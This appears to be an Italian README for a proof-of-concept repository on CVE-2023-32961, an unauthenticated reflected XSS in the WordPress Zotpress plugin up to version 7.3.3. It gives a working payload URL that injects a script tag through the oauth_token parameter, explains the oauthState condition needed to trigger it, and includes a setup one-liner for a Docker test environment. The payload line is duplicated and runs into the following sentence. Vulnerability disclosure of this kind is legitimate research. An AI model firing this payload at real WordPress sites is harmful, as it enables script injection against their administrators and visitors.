
PoC di CVE-2023-32961
Questa repository riguarda la vulnerabilità XSS nel plugin Wordpress Zotpress.
Zotpress
≤ 7.3.3
zotpress
https://wordpress.org/plugins/zotpress/
Non autenticato
La funzione get_request_token in zotpress/lib/admin/admin.accounts.oauth.php è vulnerabile a un attacco XSS.
get_request_token. (solo la prima volta)
Invia un payload come questo: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>Hai bisogno di un account zotero.org.
Devi impostare il valore di oauthState a 1 per attivarla. Se il payload precedente non funziona, devi trovare un modo per impostare oauthState a 1.
espressione condizionale :
$_GET['oauth_token'] != $state['request_token_info']['oauth_token']
Estensione PHP oauth facile da installare:
Comando in una riga :
sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
Testato nell'immagine Docker wordpress:latest.